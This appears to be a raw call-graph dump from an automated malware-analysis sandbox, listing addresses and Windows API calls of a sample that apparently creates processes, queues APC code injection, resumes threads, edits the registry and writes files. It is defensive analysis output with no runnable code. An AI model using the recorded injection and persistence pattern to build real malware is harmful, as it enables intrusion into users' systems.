35439->35434 35440 40a5bfe lstrcpynA LoadLibraryExA 35439->35440 35440->35434 35441 40a5c30 lstrcpynA LoadLibraryExA 35440->35441 35441->35434 35442->35429 35443 40c5222 35444 40a47d0 11 API calls 35443->35444 35445 40c5243 35444->35445 35446 40a475c 11 API calls 35445->35446 35447 40c527a 35446->35447 36229 40b7b88 35447->36229 35450 40a47d0 11 API calls 35451 40c52bf 35450->35451 35452 40a475c 11 API calls 35451->35452 35453 40c52f6 35452->35453 35454 40b7b88 17 API calls 35453->35454 35455 40c531a 35454->35455 35456 40a47d0 11 API calls 35455->35456 35457 40c533b 35456->35457 35458 40a475c 11 API calls 35457->35458 35459 40c5372 35458->35459 35460 40b7b88 17 API calls 35459->35460 35461 40c5396 35460->35461 35462 40a47d0 11 API calls 35461->35462 35463 40c53b7 35462->35463 35464 40a475c 11 API calls 35463->35464 35465 40c53ee 35464->35465 35466 40b7b88 17 API calls 35465->35466 35467 40c5412 35466->35467 35468 40a47d0 11 API calls 35467->35468 35469 40c5433 35468->35469 35470 40a475c 11 API calls 35469->35470 35471 40c546a 35470->35471 35472 40b7b88 17 API calls 35471->35472 35473 40c548e 35472->35473 35474 40a47d0 11 API calls 35473->35474 35475 40c54c8 35474->35475 36238 40bd598 35475->36238 35478 40a47d0 11 API calls 35479 40c5535 35478->35479 35480 40a475c 11 API calls 35479->35480 35481 40c556c 35480->35481 35482 40b7b88 17 API calls 35481->35482 35483 40c5590 35482->35483 35484 40a47d0 11 API calls 35483->35484 35485 40c55b1 35484->35485 35486 40a475c 11 API calls 35485->35486 35487 40c55e8 35486->35487 35488 40b7b88 17 API calls 35487->35488 35489 40c560c 35488->35489 35490 40a47d0 11 API calls 35489->35490 35491 40c562d 35490->35491 35492 40a475c 11 API calls 35491->35492 35493 40c5664 35492->35493 35494 40b7b88 17 API calls 35493->35494 35495 40c5688 35494->35495 35496 40a47d0 11 API calls 35495->35496 35497 40c56a9 35496->35497 35498 40a475c 11 API calls 35497->35498 35499 40c56e0 35498->35499 35500 40b7b88 17 API calls 35499->35500 35501 40c5704 35500->35501 35502 40a47d0 11 API calls 35501->35502 35503 40c5725 35502->35503 35504 40a475c 11 API calls 35503->35504 35505 40c575c 35504->35505 35506 40b7b88 17 API calls 35505->35506 35507 40c5780 35506->35507 35508 40a47d0 11 API calls 35507->35508 35509 40c57a1 35508->35509 35510 40a475c 11 API calls 35509->35510 35511 40c57d8 35510->35511 35512 40b7b88 17 API calls 35511->35512 35513 40c57fc 35512->35513 35514 40a47d0 11 API calls 35513->35514 35515 40c581d 35514->35515 35516 40a475c 11 API calls 35515->35516 35517 40c5854 35516->35517 35518 40b7b88 17 API calls 35517->35518 35519 40c5878 35518->35519 35520 40a47d0 11 API calls 35519->35520 35521 40c5899 35520->35521 35522 40a475c 11 API calls 35521->35522 35523 40c58d0 35522->35523 35524 40b7b88 17 API calls 35523->35524 35525 40c58f4 35524->35525 35526 40a47d0 11 API calls 35525->35526 35527 40c5915 35526->35527 35528 40a475c 11 API calls 35527->35528 35529 40c594c 35528->35529 35530 40b7b88 17 API calls 35529->35530 35531 40c5970 35530->35531 35532 40c64b4 35531->35532 35533 40c5985 35531->35533 35535 40a47d0 11 API calls 35532->35535 35534 40a47d0 11 API calls 35533->35534 35536 40c59a6 35534->35536 35537 40c64d5 35535->35537 35538 40a475c 11 API calls 35536->35538 35539 40a475c 11 API calls 35537->35539 35540 40c59dd 35538->35540 35541 40c650c 35539->35541 35542 40b7b88 17 API calls 35540->35542 35543 40b7b88 17 API calls 35541->35543 35545 40c5a01 35542->35545 35544 40c6530 35543->35544 35547 40a47d0 11 API calls 35544->35547 35546 40a47d0 11 API calls 35545->35546 35548 40c5a22 35546->35548 35549 40c6551 35547->35549 35550 40a475c 11 API calls 35548->35550 35551 40a475c 11 API calls 35549->35551 35552 40c5a59 35550->35552 35553 40c6588 35551->35553 35554 40b7b88 17 API calls 35552->35554 35555 40b7b88 17 API calls 35553->35555 35556 40c5a7d 35554->35556 35557 40c65ac 35555->35557 35558 40a47d0 11 API calls 35556->35558 35559 40a47d0 11 API calls 35557->35559 35560 40c5a9e 35558->35560 35561 40c65cd 35559->35561 35562 40a475c 11 API calls 35560->35562 35563 40a475c 11 API calls 35561->35563 35564 40c5ad5 35562->35564 35565 40c6604 35563->35565 35566 40b7b88 17 API calls 35564->35566 35567 40b7b88 17 API calls 35565->35567 35568 40c5af9 35566->35568 35569 40c6628 35567->35569 35570 40a475c 11 API calls 35568->35570 35571 40a47d0 11 API calls 35569->35571 35572 40c5b11 35570->35572 35575 40c6649 35571->35575 35573 40c5b1c WinExec 35572->35573 35574 40a47d0 11 API calls 35573->35574 35577 40c5b43 35574->35577 35576 40a475c 11 API calls 35575->35576 35579 40c6680 35576->35579 35578 40a475c 11 API calls 35577->35578 35582 40c5b7a 35578->35582 35580 40b7b88 17 API calls 35579->35580 35581 40c66a4 35580->35581 35584 40c72bf 35581->35584 35585 40c66b9 35581->35585 35583 40b7b88 17 API calls 35582->35583 35587 40c5b9e 35583->35587 35586 40a47d0 11 API calls 35584->35586 35588 40a47d0 11 API calls 35585->35588 35593 40c72e0 35586->35593 35589 40a47d0 11 API calls 35587->35589 35590 40c66da 35588->35590 35592 40c5bbf 35589->35592 35591 40c66f2 35590->35591 35594 40a475c 11 API calls 35591->35594 35596 40a475c 11 API calls 35592->35596 35595 40a475c 11 API calls 35593->35595 35597 40c6711 35594->35597 35598 40c7317 35595->35598 35599 40c5bf6 35596->35599 35600 40b7b88 17 API calls 35597->35600 35601 40b7b88 17 API calls 35598->35601 35603 40b7b88 17 API calls 35599->35603 35604 40c6735 35600->35604 35602 40c733b 35601->35602 35605 40a47d0 11 API calls 35602->35605 35606 40c5c1a 35603->35606 35607 40a47d0 11 API calls 35604->35607 35611 40c735c 35605->35611 35608 40a47d0 11 API calls 35606->35608 35609 40c6756 35607->35609 35612 40c5c3b 35608->35612 35610 40c676e 35609->35610 35613 40a475c 11 API calls 35610->35613 35614 40a475c 11 API calls 35611->35614 35615 40a475c 11 API calls 35612->35615 35616 40c678d 35613->35616 35617 40c7393 35614->35617 35618 40c5c72 35615->35618 35619 40b7b88 17 API calls 35616->35619 35620 40b7b88 17 API calls 35617->35620 35621 40b7b88 17 API calls 35618->35621 35622 40c67b1 35619->35622 35623 40c73b7 35620->35623 35627 40c5c96 35621->35627 35624 40a47d0 11 API calls 35622->35624 35625 40a47d0 11 API calls 35623->35625 35626 40c67d2 35624->35626 35628 40c73d8 35625->35628 35629 40c67ea 35626->35629 36657 40b9e10 29 API calls 35627->36657 35632 40a475c 11 API calls 35628->35632 35631 40a475c 11 API calls 35629->35631 35635 40c6809 35631->35635 35636 40c740f 35632->35636 35633 40c5cbd 35634 40a47d0 11 API calls 35633->35634 35637 40c5cde 35634->35637 35638 40b7b88 17 API calls 35635->35638 35639 40b7b88 17 API calls 35636->35639 35640 40a475c 11 API calls 35637->35640 35641 40c682d 35638->35641 35648 40c7433 35639->35648 35646 40c5d15 35640->35646 35642 40a475c 11 API calls 35641->35642 35643 40c6859 35642->35643 35647 40c6871 35643->35647 35644 40c7c13 35645 40a47d0 11 API calls 35644->35645 35652 40c7c34 35645->35652 35649 40b7b88 17 API calls 35646->35649 35654 40c687c CreateProcessAsUserW 35647->35654 35648->35644 35650 40a47d0 11 API calls 35648->35650 35651 40c5d39 35649->35651 35661 40c747e 35650->35661 35653 40a47d0 11 API calls 35651->35653 35658 40a475c 11 API calls 35652->35658 35662 40c5d5a 35653->35662 35655 40c688e 35654->35655 35656 40c690a 35654->35656 35657 40a47d0 11 API calls 35655->35657 35659 40a47d0 11 API calls 35656->35659 35660 40c68af 35657->35660 35667 40c7c6b 35658->35667 35665 40c692b 35659->35665 35663 40c68ba 35660->35663 35664 40a475c 11 API calls 35661->35664 35666 40a475c 11 API calls 35662->35666 35669 40a475c 11 API calls 35663->35669 35672 40c74b5 35664->35672 35668 40a475c 11 API calls 35665->35668 35675 40c5d91 35666->35675 35670 40b7b88 17 API calls 35667->35670 35679 40c6962 35668->35679 35671 40c68e6 35669->35671 35673 40c7c8f 35670->35673 35676 40c68f1 35671->35676 35677 40b7b88 17 API calls 35672->35677 35674 40a47d0 11 API calls 35673->35674 35683 40c7cb0 35674->35683 35680 40b7b88 17 API calls 35675->35680 35686 40b7b88 17 API calls 35676->35686 35678 40c74d9 35677->35678 35681 40a47d0 11 API calls 35678->35681 35684 40b7b88 17 API calls 35679->35684 35682 40c5db5 35680->35682 35690 40c74fa 35681->35690 35685 40a47d0 11 API calls 35682->35685 35688 40a475c 11 API calls 35683->35688 35687 40c6986 35684->35687 35691 40c5dd6 35685->35691 35686->35656 35689 40a47d0 11 API calls 35687->35689 35695 40c7ce7 35688->35695 35693 40c69a7 35689->35693 35692 40a475c 11 API calls 35690->35692 35694 40a475c 11 API calls 35691->35694 35698 40c7531 35692->35698 35696 40a475c 11 API calls 35693->35696 35700 40c5e0d 35694->35700 35697 40b7b88 17 API calls 35695->35697 35703 40c69de 35696->35703 35699 40c7d0b 35697->35699 35702 40b7b88 17 API calls 35698->35702 35701 40a47d0 11 API calls 35699->35701 35704 40b7b88 17 API calls 35700->35704 35708 40c7d2c 35701->35708 35705 40c7555 35702->35705 35709 40b7b88 17 API calls 35703->35709 35706 40c5e31 35704->35706 35707 40a47d0 11 API calls 35705->35707 35713 40a47d0 11 API calls 35706->35713 35714 40c7576 35707->35714 35711 40a475c 11 API calls 35708->35711 35710 40c6a02 35709->35710 35715 40a4968 11 API calls 35710->35715 35719 40c7d63 35711->35719 35718 40c5e71 35713->35718 35717 40a475c 11 API calls 35714->35717 35716 40c6a26 35715->35716 35720 40a47d0 11 API calls 35716->35720 35723 40c75ad 35717->35723 35721 40a475c 11 API calls 35718->35721 35722 40b7b88 17 API calls 35719->35722 35724 40c6a55 35720->35724 35726 40c5ea8 35721->35726 35728 40c7d87 35722->35728 35725 40b7b88 17 API calls 35723->35725 35729 40a475c 11 API calls 35724->35729 35727 40c75d1 35725->35727 35732 40b7b88 17 API calls 35726->35732 36250 40bd418 35727->36250 35731 40b7b88 17 API calls 35728->35731 35737 40c6a8c 35729->35737 35738 40c7dba 35731->35738 35734 40c5ecc 35732->35734 35736 40a47d0 11 API calls 35734->35736 35735 40a47d0 11 API calls 35739 40c7615 35735->35739 35743 40c5eed 35736->35743 35740 40b7b88 17 API calls 35737->35740 35741 40b7b88 17 API calls 35738->35741 35744 40a47d0 11 API calls 35739->35744 35742 40c6ab0 35740->35742 35747 40c7ded 35741->35747 35745 40a47d0 11 API calls 35742->35745 35746 40a475c 11 API calls 35743->35746 35749 40c764d 35744->35749 35748 40c6ad1 35745->35748 35750 40c5f24 35746->35750 35751 40b7b88 17 API calls 35747->35751 35752 40a475c 11 API calls 35748->35752 35753 40a475c 11 API calls 35749->35753 35754 40b7b88 17 API calls 35750->35754 35756 40c7e20 35751->35756 35758 40c6b08 35752->35758 35759 40c7684 35753->35759 35755 40c5f48 35754->35755 35757 40a47d0 11 API calls 35755->35757 35760 40b7b88 17 API calls 35756->35760 35767 40c5f69 35757->35767 35763 40b7b88 17 API calls 35758->35763 35761 40b7b88 17 API calls 35759->35761 35762 40c7e53 35760->35762 35764 40c76a8 35761->35764 35765 40a47d0 11 API calls 35762->35765 35766 40c6b2c 35763->35766 35768 40a47d0 11 API calls 35764->35768 35771 40c7e74 35765->35771 35769 40a47d0 11 API calls 35766->35769 35770 40a475c 11 API calls 35767->35770 35773 40c76c9 35768->35773 35772 40c6b4d 35769->35772 35774 40c5fa0 35770->35774 35775 40a475c 11 API calls 35771->35775 35776 40a475c 11 API calls 35772->35776 35777 40a475c 11 API calls 35773->35777 35778 40b7b88 17 API calls 35774->35778 35780 40c7eab 35775->35780 35781 40c6b84 35776->35781 35783 40c7700 35777->35783 35779 40c5fc4 35778->35779 36658 40b5a30 42 API calls 35779->36658 35784 40b7b88 17 API calls 35780->35784 35787 40b7b88 17 API calls 35781->35787 35788 40b7b88 17 API calls 35783->35788 35786 40c7ecf 35784->35786 35785 40c5ff0 35794 40a4b3c 11 API calls 35785->35794 35790 40a47d0 11 API calls 35786->35790 35791 40c6ba8 35787->35791 35789 40c7724 35788->35789 36257 40a7dd4 35789->36257 35803 40c7ef0 35790->35803 36660 40bc20c 24 API calls 35791->36660 35797 40c6005 35794->35797 35796 40c6bbc 35799 40a47d0 11 API calls 35796->35799 35800 40a47d0 11 API calls 35797->35800 35798 40c7a0d 35802 40a47d0 11 API calls 35798->35802 35805 40c6be2 35799->35805 35806 40c6026 35800->35806 35801 40a47d0 11 API calls 35807 40c7757 35801->35807 35808 40c7a2e 35802->35808 35804 40a475c 11 API calls 35803->35804 35813 40c7f27 35804->35813 35809 40a475c 11 API calls 35805->35809 35810 40a475c 11 API calls 35806->35810 35811 40a475c 11 API calls 35807->35811 35812 40a475c 11 API calls 35808->35812 35815 40c6c19 35809->35815 35816 40c605d 35810->35816 35820 40c778e 35811->35820 35818 40c7a65 35812->35818 35814 40b7b88 17 API calls 35813->35814 35817 40c7f4b 35814->35817 35821 40b7b88 17 API calls 35815->35821 35822 40b7b88 17 API calls 35816->35822 35819 40a47d0 11 API calls 35817->35819 35824 40b7b88 17 API calls 35818->35824 35832 40c7f6c 35819->35832 35823 40b7b88 17 API calls 35820->35823 35825 40c6c3d 35821->35825 35826 40c6081 35822->35826 35827 40c77b2 35823->35827 35828 40c7a89 35824->35828 35829 40a47d0 11 API calls 35825->35829 35833 40a4968 11 API calls 35826->35833 35830 40a47d0 11 API calls 35827->35830 35831 40a47d0 11 API calls 35828->35831 35837 40c6c5e 35829->35837 35838 40c77d3 35830->35838 35839 40c7aaa 35831->35839 35834 40a475c 11 API calls 35832->35834 35835 40c609e RtlMoveMemory 35833->35835 35843 40c7fa3 35834->35843 35836 40a47d0 11 API calls 35835->35836 35844 40c60c5 35836->35844 35840 40a475c 11 API calls 35837->35840 35841 40a475c 11 API calls 35838->35841 35842 40a475c 11 API calls 35839->35842 35846 40c6c95 35840->35846 35848 40c780a 35841->35848 35849 40c7ae1 35842->35849 35845 40b7b88 17 API calls 35843->35845 35847 40a475c 11 API calls 35844->35847 35852 40c7fc7 35845->35852 35850 40b7b88 17 API calls 35846->35850 35857 40c60fc 35847->35857 35854 40b7b88 17 API calls 35848->35854 35851 40b7b88 17 API calls 35849->35851 35853 40c6cb9 35850->35853 35855 40c7b05 35851->35855 35861 40b7b88 17 API calls 35852->35861 35856 40a47d0 11 API calls 35853->35856 35858 40c782e 35854->35858 35860 40a47d0 11 API calls 35855->35860 35864 40c6cda 35856->35864 35862 40b7b88 17 API calls 35857->35862 35859 40a47d0 11 API calls 35858->35859 35866 40c784f 35859->35866 35867 40c7b26 35860->35867 35868 40c7ffa 35861->35868 35863 40c6120 35862->35863 35865 40a47d0 11 API calls 35863->35865 35869 40a475c 11 API calls 35864->35869 35873 40c6141 35865->35873 35870 40a475c 11 API calls 35866->35870 35871 40a475c 11 API calls 35867->35871 35872 40b7b88 17 API calls 35868->35872 35874 40c6d11 35869->35874 35876 40c7886 35870->35876 35877 40c7b5d 35871->35877 35878 40c802d 35872->35878 35875 40a475c 11 API calls 35873->35875 35879 40b7b88 17 API calls 35874->35879 35886 40c6178 35875->35886 35881 40b7b88 17 API calls 35876->35881 35882 40b7b88 17 API calls 35877->35882 35883 40b7b88 17 API calls 35878->35883 35880 40c6d35 35879->35880 35884 40c6d3e NtQueueApcThread 35880->35884 35885 40c6d55 35880->35885 35887 40c78aa 35881->35887 35888 40c7b81 35882->35888 35895 40c8060 35883->35895 35884->35885 35890 40a47d0 11 API calls 35885->35890 35892 40b7b88 17 API calls 35886->35892 36261 40bd070 35887->36261 35889 40a47d0 11 API calls 35888->35889 35900 40c7ba2 35889->35900 35902 40c6d76 35890->35902 35896 40c619c 35892->35896 35894 40a44c4 11 API calls 35897 40c78cf 35894->35897 35901 40b7b88 17 API calls 35895->35901 35898 40a47d0 11 API calls 35896->35898 35899 40a47d0 11 API calls 35897->35899 35905 40c61bd 35898->35905 35906 40c78f0 35899->35906 35903 40a475c 11 API calls 35900->35903 35907 40c8093 35901->35907 35904 40a475c 11 API calls 35902->35904 35911 40c7bd9 35903->35911 35909 40c6dad 35904->35909 35908 40a475c 11 API calls 35905->35908 35910 40a475c 11 API calls 35906->35910 35912 40b7b88 17 API calls 35907->35912 35918 40c61f4 35908->35918 35914 40b7b88 17 API calls 35909->35914 35921 40c7927 35910->35921 35915 40b7b88 17 API calls 35911->35915 35913 40c80c6 35912->35913 35916 40a47d0 11 API calls 35913->35916 35917 40c6dd1 35914->35917 35919 40c7bfd 35915->35919 35926 40c80e7 35916->35926 35920 40a47d0 11 API calls 35917->35920 35923 40b7b88 17 API calls 35918->35923 36281 40a4968 35919->36281 35933 40c6df2 35920->35933 35928 40b7b88 17 API calls 35921->35928 35927 40c6218 35923->35927 35932 40a475c 11 API calls 35926->35932 35929 40a47d0 11 API calls 35927->35929 35930 40c794b 35928->35930 35935 40c6239 35929->35935 35931 40a47d0 11 API calls 35930->35931 35936 40c796c 35931->35936 35937 40c811e 35932->35937 35934 40a475c 11 API calls 35933->35934 35939 40c6e29 35934->35939 35938 40a475c 11 API calls 35935->35938 35940 40a475c 11 API calls 35936->35940 35941 40b7b88 17 API calls 35937->35941 35946 40c6270 35938->35946 35943 40b7b88 17 API calls 35939->35943 35948 40c79a3 35940->35948 35942 40c8142 35941->35942 35944 40a47d0 11 API calls 35942->35944 35945 40c6e4d 35943->35945 35952 40c8163 35944->35952 35947 40a47d0 11 API calls 35945->35947 35949 40b7b88 17 API calls 35946->35949 35955 40c6e6e 35947->35955 35951 40b7b88 17 API calls 35948->35951 35950 40c6294 35949->35950 36659 40ba160 56 API calls 35950->36659 35959 40c79c7 35951->35959 35954 40a475c 11 API calls 35952->35954 35958 40c819a 35954->35958 35956 40a475c 11 API calls 35955->35956 35962 40c6ea5 35956->35962 35957 40c62a5 35961 40b7b88 17 API calls 35958->35961 36266 40bcd1c 35959->36266 35966 40c81be 35961->35966 35963 40b7b88 17 API calls 35962->35963 35964 40c6ec9 ResumeThread 35963->35964 35965 40a47d0 11 API calls 35964->35965 35969 40c6ef5 35965->35969 35967 40b7b88 17 API calls 35966->35967 35968 40c81f1 35967->35968 35970 40a47d0 11 API calls 35968->35970 35971 40a475c 11 API calls 35969->35971 35972 40c8212 35970->35972 35974 40c6f2c 35971->35974 35973 40a475c 11 API calls 35972->35973 35978 40c8249 35973->35978 35975 40b7b88 17 API calls 35974->35975 35976 40c6f50 35975->35976 35977 40a47d0 11 API calls 35976->35977 35981 40c6f71 35977->35981 35979 40b7b88 17 API calls 35978->35979 35980 40c826d 35979->35980 35982 40a47d0 11 API calls 35980->35982 35983 40a475c 11 API calls 35981->35983 35984 40c828e 35982->35984 35986 40c6fa8 35983->35986 35985 40a475c 11 API calls 35984->35985 35989 40c82c5 35985->35989 35987 40b7b88 17 API calls 35986->35987 35988 40c6fcc 35987->35988 35990 40a47d0 11 API calls 35988->35990 35991 40b7b88 17 API calls 35989->35991 35993 40c6fed 35990->35993 35992 40c82e9 35991->35992 35994 40a47d0 11 API calls 35992->35994 35995 40a475c 11 API calls 35993->35995 35996 40c830a 35994->35996 35998 40c7024 35995->35998 35997 40a475c 11 API calls 35996->35997 36001 40c8341 35997->36001 35999 40b7b88 17 API calls 35998->35999 36000 40c7048 CloseHandle 35999->36000 36002 40a47d0 11 API calls 36000->36002 36003 40b7b88 17 API calls 36001->36003 36004 40c7074 36002->36004 36006 40c8365 36003->36006 36005 40a475c 11 API calls 36004->36005 36008 40c70ab 36005->36008 36007 40b7b88 17 API calls 36006->36007 36009 40c8398 36007->36009 36010 40b7b88 17 API calls 36008->36010 36012 40b7b88 17 API calls 36009->36012 36011 40c70cf 36010->36011 36013 40a47d0 11 API calls 36011->36013 36014 40c83cb 36012->36014 36015 40c70f0 36013->36015 36017 40b7b88 17 API calls 36014->36017 36016 40a475c 11 API calls 36015->36016 36018 40c7127 36016->36018 36019 40c83fe 36017->36019 36020 40b7b88 17 API calls 36018->36020 36021 40b7b88 17 API calls 36019->36021 36022 40c714b 36020->36022 36023 40c8431 36021->36023 36025 40a47d0 11 API calls 36022->36025 36024 40a47d0 11 API calls 36023->36024 36026 40c8452 36024->36026 36027 40c716c 36025->36027 36028 40a475c 11 API calls 36026->36028 36029 40a475c 11 API calls 36027->36029 36031 40c8489 36028->36031 36030 40c71a3 36029->36030 36032 40b7b88 17 API calls 36030->36032 36033 40b7b88 17 API calls 36031->36033 36034 40c71c7 36032->36034 36035 40c84ad 36033->36035 36036 40a47d0 11 API calls 36034->36036 36037 40a47d0 11 API calls 36035->36037 36039 40c71e8 36036->36039 36038 40c84ce 36037->36038 36040 40a475c 11 API calls 36038->36040 36041 40a475c 11 API calls 36039->36041 36043 40c8505 36040->36043 36042 40c721f 36041->36042 36044 40b7b88 17 API calls 36042->36044 36045 40b7b88 17 API calls 36043->36045 36046 40c7243 36044->36046 36048 40c8529 36045->36048 36047 40a47d0 11 API calls 36046->36047 36050 40c7264 36047->36050 36049 40b7b88 17 API calls 36048->36049 36052 40c855c 36049->36052 36051 40a475c 11 API calls 36050->36051 36054 40c729b 36051->36054 36053 40b7b88 17 API calls 36052->36053 36056 40c858f 36053->36056 36055 40b7b88 17 API calls 36054->36055 36055->35584 36057 40b7b88 17 API calls 36056->36057 36058 40c85c2 36057->36058 36059 40b7b88 17 API calls 36058->36059 36060 40c85f5 36059->36060 36061 40b7b88 17 API calls 36060->36061 36062 40c8628 36061->36062 36063 40a47d0 11 API calls 36062->36063 36064 40c8649 36063->36064 36065 40a475c 11 API calls 36064->36065 36066 40c8680 36065->36066 36067 40b7b88 17 API calls 36066->36067 36068 40c86a4 36067->36068 36069 40a47d0 11 API calls 36068->36069 36070 40c86c5 36069->36070 36071 40a475c 11 API calls 36070->36071 36072 40c86fc 36071->36072 36073 40b7b88 17 API calls 36072->36073 36074 40c8720 36073->36074 36075 40a47d0 11 API calls 36074->36075 36076 40c8741 36075->36076 36077 40a475c 11 API calls 36076->36077 36078 40c8778 36077->36078 36079 40b7b88 17 API calls 36078->36079 36080 40c879c 36079->36080 36081 40a47d0 11 API calls 36080->36081 36082 40c87bd 36081->36082 36083 40a475c 11 API calls 36082->36083 36084 40c87f4 36083->36084 36085 40b7b88 17 API calls 36084->36085 36086 40c8818 36085->36086 36087 40a47d0 11 API calls 36086->36087 36088 40c8839 36087->36088 36089 40a475c 11 API calls 36088->36089 36090 40c8870 36089->36090 36091 40b7b88 17 API calls 36090->36091 36092 40c8894 36091->36092 36093 40b7b88 17 API calls 36092->36093 36094 40c88a3 36093->36094 36095 40b7b88 17 API calls 36094->36095 36096 40c88b2 36095->36096 36097 40b7b88 17 API calls 36096->36097 36098 40c88c1 36097->36098 36099 40b7b88 17 API calls 36098->36099 36100 40c88d0 36099->36100 36101 40b7b88 17 API calls 36100->36101 36102 40c88df 36101->36102 36103 40b7b88 17 API calls 36102->36103 36104 40c88ee 36103->36104 36105 40b7b88 17 API calls 36104->36105 36106 40c88fd 36105->36106 36107 40b7b88 17 API calls 36106->36107 36108 40c890c 36107->36108 36109 40b7b88 17 API calls 36108->36109 36110 40c891b 36109->36110 36111 40b7b88 17 API calls 36110->36111 36112 40c892a 36111->36112 36113 40b7b88 17 API calls 36112->36113 36114 40c8939 36113->36114 36115 40b7b88 17 API calls 36114->36115 36116 40c8948 36115->36116 36117 40b7b88 17 API calls 36116->36117 36118 40c8957 36117->36118 36119 40b7b88 17 API calls 36118->36119 36120 40c8966 36119->36120 36121 40b7b88 17 API calls 36120->36121 36122 40c8975 36121->36122 36123 40a47d0 11 API calls 36122->36123 36124 40c8996 36123->36124 36125 40a475c 11 API calls 36124->36125 36126 40c89cd 36125->36126 36127 40b7b88 17 API calls 36126->36127 36128 40c89f1 36127->36128 36129 40a47d0 11 API calls 36128->36129 36130 40c8a12 36129->36130 36131 40a475c 11 API calls 36130->36131 36132 40c8a49 36131->36132 36133 40b7b88 17 API calls 36132->36133 36134 40c8a6d 36133->36134 36135 40a47d0 11 API calls 36134->36135 36136 40c8a8e 36135->36136 36137 40a475c 11 API calls 36136->36137 36138 40c8ac5 36137->36138 36139 40b7b88 17 API calls 36138->36139 36140 40c8ae9 36139->36140 36141 40b7b88 17 API calls 36140->36141 36142 40c8b1c 36141->36142 36143 40b7b88 17 API calls 36142->36143 36144 40c8b4f 36143->36144 36145 40b7b88 17 API calls 36144->36145 36146 40c8b82 36145->36146 36147 40b7b88 17 API calls 36146->36147 36148 40c8bb5 36147->36148 36149 40b7b88 17 API calls 36148->36149 36150 40c8be8 36149->36150 36151 40b7b88 17 API calls 36150->36151 36152 40c8c1b 36151->36152 36153 40b7b88 17 API calls 36152->36153 36154 40c8c4e 36153->36154 36155 40a47d0 11 API calls 36154->36155 36156 40c8c6f 36155->36156 36157 40a475c 11 API calls 36156->36157 36158 40c8ca6 36157->36158 36159 40b7b88 17 API calls 36158->36159 36160 40c8cca 36159->36160 36161 40a47d0 11 API calls 36160->36161 36162 40c8ceb 36161->36162 36163 40a475c 11 API calls 36162->36163 36164 40c8d22 36163->36164 36165 40b7b88 17 API calls 36164->36165 36166 40c8d46 36165->36166 36167 40a47d0 11 API calls 36166->36167 36168 40c8d67 36167->36168 36169 40a475c 11 API calls 36168->36169 36170 40c8d9e 36169->36170 36171 40b7b88 17 API calls 36170->36171 36172 40c8dc2 36171->36172 36173 40b7b88 17 API calls 36172->36173 36174 40c8df5 36173->36174 36175 40b7b88 17 API calls 36174->36175 36176 40c8e28 36175->36176 36177 40b7b88 17 API calls 36176->36177 36178 40c8e5b 36177->36178 36179 40b7b88 17 API calls 36178->36179 36180 40c8e8e 36179->36180 36181 40b7b88 17 API calls 36180->36181 36182 40c8ec1 36181->36182 36183 40b7b88 17 API calls 36182->36183 36184 40c8ef4 36183->36184 36185 40b7b88 17 API calls 36184->36185 36186 40c8f27 36185->36186 36187 40b7b88 17 API calls 36186->36187 36188 40c8f5a 36187->36188 36189 40b7b88 17 API calls 36188->36189 36190 40c8f8d 36189->36190 36191 40b7b88 17 API calls 36190->36191 36192 40c8fc0 36191->36192 36193 40b7b88 17 API calls 36192->36193 36194 40c8ff3 36193->36194 36195 40b7b88 17 API calls 36194->36195 36196 40c9026 36195->36196 36197 40b7b88 17 API calls 36196->36197 36198 40c9059 36197->36198 36199 40b7b88 17 API calls 36198->36199 36200 40c908c 36199->36200 36201 40b7b88 17 API calls 36200->36201 36202 40c90bf 36201->36202 36203 40b7b88 17 API calls 36202->36203 36204 40c90f2 36203->36204 36205 40b7b88 17 API calls 36204->36205 36206 40c9125 36205->36206 36207 40b7b88 17 API calls 36206->36207 36208 40c9158 36207->36208 36209 40b7b88 17 API calls 36208->36209 36210 40c918b 36209->36210 36211 40a47d0 11 API calls 36210->36211 36212 40c91ac 36211->36212 36213 40a475c 11 API calls 36212->36213 36214 40c91e3 36213->36214 36215 40b7b88 17 API calls 36214->36215 36216 40c9207 36215->36216 36217 40a47d0 11 API calls 36216->36217 36218 40c9228 36217->36218 36219 40a475c 11 API calls 36218->36219 36220 40c925f 36219->36220 36221 40b7b88 17 API calls 36220->36221 36222 40c9283 36221->36222 36223 40a47d0 11 API calls 36222->36223 36224 40c92a4 36223->36224 36225 40a475c 11 API calls 36224->36225 36226 40c92db 36225->36226 36227 40b7b88 17 API calls 36226->36227 36228 40c92ff ExitProcess 36227->36228 36230 40b7b9d 36229->36230 36231 40b7ba5 LoadLibraryW GetModuleHandleW 36230->36231 36232 40a4910 36231->36232 36233 40b7bd0 GetProcAddress 36232->36233 36661 40b7ac0 36233->36661 36235 40b7bf7 36670 40a4494 36235->36670 36239 40bd5af 36238->36239 36240 40bd5da RegOpenKeyA 36239->36240 36241 40bd5e8 36240->36241 36242 40a4968 11 API calls 36241->36242 36243 40bd600 36242->36243 36244 40bd60d RegSetValueExA RegCloseKey 36243->36244 36245 40bd631 36244->36245 36246 40a4494 11 API calls 36245->36246 36247 40bd63e 36246->36247 36248 40a4470 11 API calls 36247->36248 36249 40bd646 36248->36249 36249->35478 36252 40bd43d 36250->36252 36251 40bd469 36254 40a4470 11 API calls 36251->36254 36252->36251 36678 40a4658 11 API calls 36252->36678 36679 40a44c4 11 API calls 36252->36679 36255 40bd47e 36254->36255 36255->35735 36258 40a4910 36257->36258 36259 40a7dde GetFileAttributesA 36258->36259 36260 40a7de9 36259->36260 36260->35798 36260->35801 36262 40a4b3c 11 API calls 36261->36262 36263 40bd088 36262->36263 36264 40bd0a9 36263->36264 36265 40a4968 11 API calls 36263->36265 36264->35894 36265->36263 36267 40bcd32 36266->36267 36680 40a4e90 36267->36680 36269 40bcd3a 36270 40bcd5a RtlDosPathNameToNtPathName_U 36269->36270 36689 40bccec 36270->36689 36272 40bcd76 NtCreateFile 36273 40bcda1 36272->36273 36274 40a4968 11 API calls 36273->36274 36275 40bcdb3 NtWriteFile NtClose 36274->36275 36276 40bcddd 36275->36276 36690 40a4bd0 36276->36690 36279 40a4470 11 API calls 36280 40bcded 36279->36280 36280->35798 36283 40a491c 36281->36283 36282 40a4957 36287 40b7ee8 36282->36287 36283->36282 36284 40a4534 11 API calls 36283->36284 36285 40a4933 36284->36285 36285->36282 36286 40a2c2c 11 API calls 36285->36286 36286->36282 36288 40b7ef0 36287->36288 36289 40a47d0 11 API calls 36288->36289 36290 40b7f33 36289->36290 36291 40a475c 11 API calls 36290->36291 36292 40b7f58 36291->36292 36293 40b7b88 17 API calls 36292->36293 36294 40b7f73 36293->36294 36295 40a47d0 11 API calls 36294->36295 36296 40b7f8c 36295->36296 36297 40a475c 11 API calls 36296->36297 36298 40b7fb1 36297->36298 36299 40b7b88 17 API calls 36298->36299 